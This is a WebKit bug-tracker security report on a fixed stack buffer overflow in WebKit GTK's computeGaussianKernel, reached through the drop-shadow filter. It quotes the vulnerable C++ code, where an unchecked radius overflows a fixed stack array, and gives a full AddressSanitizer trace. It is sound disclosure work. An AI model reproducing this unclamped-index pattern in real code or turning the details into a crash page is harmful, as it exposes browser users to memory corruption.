Bug 265659 - [TextureMapper][GTK] WebKit GTK computeGaussianKernel Stack Buffer Overflow Vulnerability for drop-shadow filter
Summary: [TextureMapper][GTK] WebKit GTK computeGaussianKernel Stack Buffer Overflow V...
Status: RESOLVED FIXED
Alias: None
Product: Security
Classification: Unclassified
Component: Security
Version: WebKit Local Build
Hardware: PC Linux
: P3 Normal
Assignee: Jonathan Bedard
URL:
Keywords: Gtk, InRadar
Depends on:
Blocks:
 
Reported: 2023-12-01 05:29 PST by Park Sangwoo
Modified: 2023-12-14 16:11 PST

See Also:


Attachments
PoC file (835 bytes, text/html), 2023-12-01 05:29 PST, Park Sangwoo
WIP patch (681 bytes, patch), 2023-12-03 13:09 PST, Fujii Hironori
test case 2 (125 bytes, text/html), 2023-12-03 13:41 PST, Fujii Hironori
Patch (3.37 KB, patch), 2023-12-05 20:01 PST, Fujii Hironori

Description Park Sangwoo 2023-12-01 05:29:27 PST
Created attachment 468832 [details]
PoC file

1. Vulnerability Title
    a. WebKit GTK computeGaussianKernel Stack Buffer Overflow Vulnerability
2. High-level overview of the vulnerability and the possible effect of using it
    1. A stack buffer overflow vulnerability exists in the WebKit GTK computeGaussianKernel function.
    2. An attacker must open an arbitrarily generated HTML file to exploit this vulnerability.
3. Exact product that was found to be vulnerable including complete version information
    1. Ubuntu 22.04.3 LTS
4. Root Cause Analysis (recommended but not required)
    1. The vulnerability exists when referring to a stack memory area in the function `computeGaussianKernel`.
    2. The `radius` is referenced in the function `computeGaussianKernel`. This causes a stack buffer overflow.
    3. The lack of size validation for `radius` leads to a stack buffer overflow.

```cpp
static unsigned blurRadiusToKernelHalfSize(float radius)
{
    return ceilf(radius * 2 + 1);
}

static int computeGaussianKernel(float radius, std::array<float, SimplifiedGaussianKernelMaxHalfSize>& kernel, std::array<float, SimplifiedGaussianKernelMaxHalfSize>& offset)
{
    unsigned kernelHalfSize = blurRadiusToKernelHalfSize(radius);
    // Debug-only check: WebKit's ASSERT compiles to nothing in release builds,
    // so an oversized radius reaches the loop below unhindered.
    ASSERT(kernelHalfSize <= GaussianKernelMaxHalfSize);

    // Fixed-size stack buffer (44 bytes, i.e. 11 floats, per the ASan frame below).
    float fullKernel[GaussianKernelMaxHalfSize];

    fullKernel[0] = 1; 
    float sum = fullKernel[0];

    // kernelHalfSize is derived from the page-controlled radius and is never
    // clamped to GaussianKernelMaxHalfSize before indexing fullKernel.
    for (unsigned i = 1; i < kernelHalfSize; ++i) {
        fullKernel[i] = gauss(i, radius);   //====> crash here
        sum += 2 * fullKernel[i]; 
    }

    float scale = 1 / sum; 
    for (unsigned i = 0; i < kernelHalfSize; ++i)
        fullKernel[i] *= scale;

    unsigned simplifiedKernelHalfSize = kernelHalfSizeToSimplifiedKernelHalfSize(kernelHalfSize);
    kernel[0] = fullKernel[0];

    for (unsigned i = 1; i < simplifiedKernelHalfSize; i++) {
        unsigned offset1 = 2 * i - 1;
        unsigned offset2 = 2 * i;

        if (offset2 >= kernelHalfSize) {
            kernel[i] = fullKernel[offset1];
            offset[i] = offset1;
            break;
        }

        kernel[i] = fullKernel[offset1] + fullKernel[offset2];
        offset[i] = (fullKernel[offset1] * offset1 + fullKernel[offset2] * offset2) / kernel[i];
    }

    return simplifiedKernelHalfSize;
}
```

```text
=================================================================
==237950==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f4bb2926dec at pc 0x7f4c093cc093 bp 0x7f4bb2926d90 sp 0x7f4bb2926d88
WRITE of size 4 at 0x7f4bb2926dec thread T9 (eadedCompositor)
    #0 0x7f4c093cc092 in WebCore::computeGaussianKernel(float, std::array<float, 6ul>&, std::array<float, 6ul>&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:359:23
    #1 0x7f4c093cc092 in WebCore::TextureMapperGL::drawBlurred(WebCore::BitmapTexture const&, WebCore::FloatRect const&, float, WebCore::TextureMapperGL::Direction, bool) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:872:36
    #2 0x7f4c093cf333 in WebCore::TextureMapperGL::applyDropShadowFilter(WTF::RefPtr<WebCore::BitmapTexture, WTF::RawPtrTraits<WebCore::BitmapTexture>, WTF::DefaultRefDerefTraits<WebCore::BitmapTexture> >, WebCore::DropShadowFilterOperation const&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:1058:13
    #3 0x7f4c093d18f1 in WebCore::TextureMapperGL::applyFilter(WTF::RefPtr<WebCore::BitmapTexture, WTF::RawPtrTraits<WebCore::BitmapTexture>, WTF::DefaultRefDerefTraits<WebCore::BitmapTexture> >, WTF::RefPtr<WebCore::FilterOperation const, WTF::RawPtrTraits<WebCore::FilterOperation const>, WTF::DefaultRefDerefTraits<WebCore::FilterOperation const> > const&, bool) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:1140:16
    #4 0x7f4c093ba606 in WebCore::BitmapTextureGL::applyFilters(WebCore::TextureMapper&, WebCore::FilterOperations const&, bool) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/BitmapTextureGL.cpp:180:28
    #5 0x7f4c093aef34 in WebCore::TextureMapperLayer::paintIntoSurface(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:680:40
    #6 0x7f4c093ae29f in WebCore::TextureMapperLayer::paintSelfAndChildrenWithIntermediateSurface(WebCore::TextureMapperPaintOptions&, WebCore::IntRect const&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:719:9
    #7 0x7f4c093ada93 in WebCore::TextureMapperLayer::paintSelfChildrenFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:653:17
    #8 0x7f4c093ac7d2 in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:744:9
    #9 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
    #10 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16
    #11 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5
    #12 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9
    #13 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
    #14 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16
    #15 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5
    #16 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9
    #17 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
    #18 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16
    #19 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5
    #20 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9
    #21 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
    #22 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16
    #23 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5
    #24 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9
    #25 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
    #26 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16
    #27 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5
    #28 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9
    #29 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
    #30 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16
    #31 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5
    #32 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9
    #33 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
    #34 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16
    #35 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5
    #36 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9
    #37 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
    #38 0x7f4c093a5810 in WebCore::TextureMapperLayer::paint(WebCore::TextureMapper&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:178:5
    #39 0x7f4c0844ed7c in WebKit::CoordinatedGraphicsScene::paintToCurrentGLContext(WebCore::TransformationMatrix const&, WebCore::FloatRect const&, unsigned int) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/CoordinatedGraphicsScene.cpp:76:23
    #40 0x7f4c0846e585 in WebKit::ThreadedCompositor::renderLayerTree() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/ThreadedCompositor.cpp:251:14
    #41 0x7f4c08472c5f in WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/ThreadedCompositor.cpp:60:68
    #42 0x7f4c08472c5f in WTF::Detail::CallableWrapper<WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0, void>::call() /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:53:39
    #43 0x7f4c0845b46f in WTF::Function<void ()>::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:82:35
    #44 0x7f4c0845b46f in WebKit::CompositingRunLoop::updateTimerFired() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/CompositingRunLoop.cpp:179:5
    #45 0x7f4c0846af2b in void std::__invoke_impl<void, void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&>(std::__invoke_memfun_deref, void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:74:14
    #46 0x7f4c0846af2b in std::__invoke_result<void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&>::type std::__invoke<void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&>(void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:96:14
    #47 0x7f4c0846af2b in void std::_Bind<void (WebKit::CompositingRunLoop::* (WebKit::CompositingRunLoop*))()>::__call<void, 0ul>(std::tuple<>&&, std::_Index_tuple<0ul>) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/functional:420:11
    #48 0x7f4c0846af2b in void std::_Bind<void (WebKit::CompositingRunLoop::* (WebKit::CompositingRunLoop*))()>::operator()<void>() /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/functional:503:17
    #49 0x7f4c0846af2b in WTF::Detail::CallableWrapper<std::_Bind<void (WebKit::CompositingRunLoop::* (WebKit::CompositingRunLoop*))()>, void>::call() /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:53:39
    #50 0x7f4c07f0b0b3 in WTF::Function<void ()>::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:82:35
    #51 0x7f4c07f0b0b3 in WTF::RunLoop::Timer::fired() /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/RunLoop.h:195:33
    #52 0x7f4c04b07ed8 in WTF::RunLoop::TimerBase::TimerBase(WTF::RunLoop&)::$_3::operator()(void*) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:177:16
    #53 0x7f4c04b07ed8 in WTF::RunLoop::TimerBase::TimerBase(WTF::RunLoop&)::$_3::__invoke(void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:169:43
    #54 0x7f4c04b05433 in WTF::RunLoop::$_0::operator()(_GSource*, int (*)(void*), void*) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:53:28
    #55 0x7f4c04b05433 in WTF::RunLoop::$_0::__invoke(_GSource*, int (*)(void*), void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:45:5
    #56 0x7f4bfcb20c43 in g_main_context_dispatch (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x55c43) (BuildId: c74e800dfd5f72649d673b44292f4a817e45150b)
    #57 0x7f4bfcb76257  (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0xab257) (BuildId: c74e800dfd5f72649d673b44292f4a817e45150b)
    #58 0x7f4bfcb202b2 in g_main_loop_run (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x552b2) (BuildId: c74e800dfd5f72649d673b44292f4a817e45150b)
    #59 0x7f4c04b069c8 in WTF::RunLoop::run() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:108:9
    #60 0x7f4c0499e9c8 in WTF::RunLoop::create(char const*, WTF::ThreadType, WTF::Thread::QOS)::$_1::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/RunLoop.cpp:114:9
    #61 0x7f4c0499e9c8 in WTF::Detail::CallableWrapper<WTF::RunLoop::create(char const*, WTF::ThreadType, WTF::Thread::QOS)::$_1, void>::call() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Function.h:53:39
    #62 0x7f4c049a97ff in WTF::Function<void ()>::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Function.h:82:35
    #63 0x7f4c049a97ff in WTF::Thread::entryPoint(WTF::Thread::NewThreadContext*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Threading.cpp:250:5
    #64 0x7f4c04b147a8 in WTF::wtfThreadEntryPoint(void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/posix/ThreadingPOSIX.cpp:242:5
    #65 0x7f4bfc494ac2 in start_thread nptl/./nptl/pthread_create.c:442:8
    #66 0x7f4bfc526a3f  misc/../sysdeps/unix/sysv/linux/x86_64/clone3.S:81

Address 0x7f4bb2926dec is located in stack of thread T9 (eadedCompositor) at offset 76 in frame
    #0 0x7f4c093cbcbf in WebCore::TextureMapperGL::drawBlurred(WebCore::BitmapTexture const&, WebCore::FloatRect const&, float, WebCore::TextureMapperGL::Direction, bool) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:856

  This frame has 6 object(s):
    [32, 76) 'fullKernel.i' (line 354) <== Memory access at offset 76 overflows this variable
    [112, 120) 'program' (line 857)
    [144, 168) 'kernel' (line 870)
    [208, 232) 'offset' (line 871)
    [272, 400) 'textureBlurMatrix' (line 877)
    [432, 560) 'ref.tmp53' (line 895)
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
      (longjmp and C++ exceptions *are* supported)
Thread T9 (eadedCompositor) created by T0 here:
    #0 0x560a95b0a5dc in pthread_create (/home/fuzz/Downloads/webkitgtk-2.41.92/build/libexec/webkit2gtk-4.0/WebKitWebProcess+0x8a5dc) (BuildId: 993abfac4fe138f0c15349dccc801d74c501b984)
    #1 0x7f4c04b14593 in WTF::Thread::establishHandle(WTF::Thread::NewThreadContext*, std::optional<unsigned long>, WTF::Thread::QOS) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/posix/ThreadingPOSIX.cpp:292:17
    #2 0x7f4c049a9e31 in WTF::Thread::create(char const*, WTF::Function<void ()>&&, WTF::ThreadType, WTF::Thread::QOS) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Threading.cpp:266:32
    #3 0x7f4c0499c7d8 in WTF::RunLoop::create(char const*, WTF::ThreadType, WTF::Thread::QOS) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/RunLoop.cpp:111:5
    #4 0x7f4c0845b0b9 in WebKit::CompositingRunLoop::CompositingRunLoop(WTF::Function<void ()>&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/CompositingRunLoop.cpp:43:17
    #5 0x7f4c0846b26d in std::_MakeUniq<WebKit::CompositingRunLoop>::__single_object std::make_unique<WebKit::CompositingRunLoop, WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0>(WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/unique_ptr.h:962:34
    #6 0x7f4c0846b26d in decltype(auto) WTF::makeUnique<WebKit::CompositingRunLoop, WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0>(WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0&&) /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/StdLibExtras.h:596:12
    #7 0x7f4c0846b26d in WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/ThreadedCompositor.cpp:60:28
    #8 0x7f4c0846aff4 in WebKit::ThreadedCompositor::create(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/ThreadedCompositor.cpp:54:26
    #9 0x7f4c09262071 in WebKit::LayerTreeHost::LayerTreeHost(WebKit::WebPage&, unsigned int) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/CoordinatedGraphics/LayerTreeHost.cpp:82:20
    #10 0x7f4c0925b38d in std::_MakeUniq<WebKit::LayerTreeHost>::__single_object std::make_unique<WebKit::LayerTreeHost, WebKit::WebPage&, unsigned long>(WebKit::WebPage&, unsigned long&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/unique_ptr.h:962:34
    #11 0x7f4c0925b38d in decltype(auto) WTF::makeUnique<WebKit::LayerTreeHost, WebKit::WebPage&, unsigned long>(WebKit::WebPage&, unsigned long&&) /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/StdLibExtras.h:596:12
    #12 0x7f4c0925b38d in WebKit::DrawingAreaCoordinatedGraphics::enterAcceleratedCompositingMode(WebCore::GraphicsLayer*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/CoordinatedGraphics/DrawingAreaCoordinatedGraphics.cpp:596:27
    #13 0x7f4c0925afda in WebKit::DrawingAreaCoordinatedGraphics::enterAcceleratedCompositingModeIfNeeded() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/CoordinatedGraphics/DrawingAreaCoordinatedGraphics.cpp:293:5
    #14 0x7f4c0916d290 in WebKit::WebPage::WebPage(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/WebPage.cpp:799:24
    #15 0x7f4c0916831e in WebKit::WebPage::create(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/WebPage.cpp:492:31
    #16 0x7f4c08c9203c in WebKit::WebProcess::createWebPage(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebProcess.cpp:856:21
    #17 0x7f4c07912bd1 in auto void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...)::operator()<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>(auto&&...) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/HandleMessage.h:136:13
    #18 0x7f4c07912bd1 in WebKit::WebProcess std::__invoke_impl<void, void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...), WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>(std::__invoke_other, WebKit::WebProcess&&, WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>&&, WebKit::WebPageCreationParameters&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:61:14
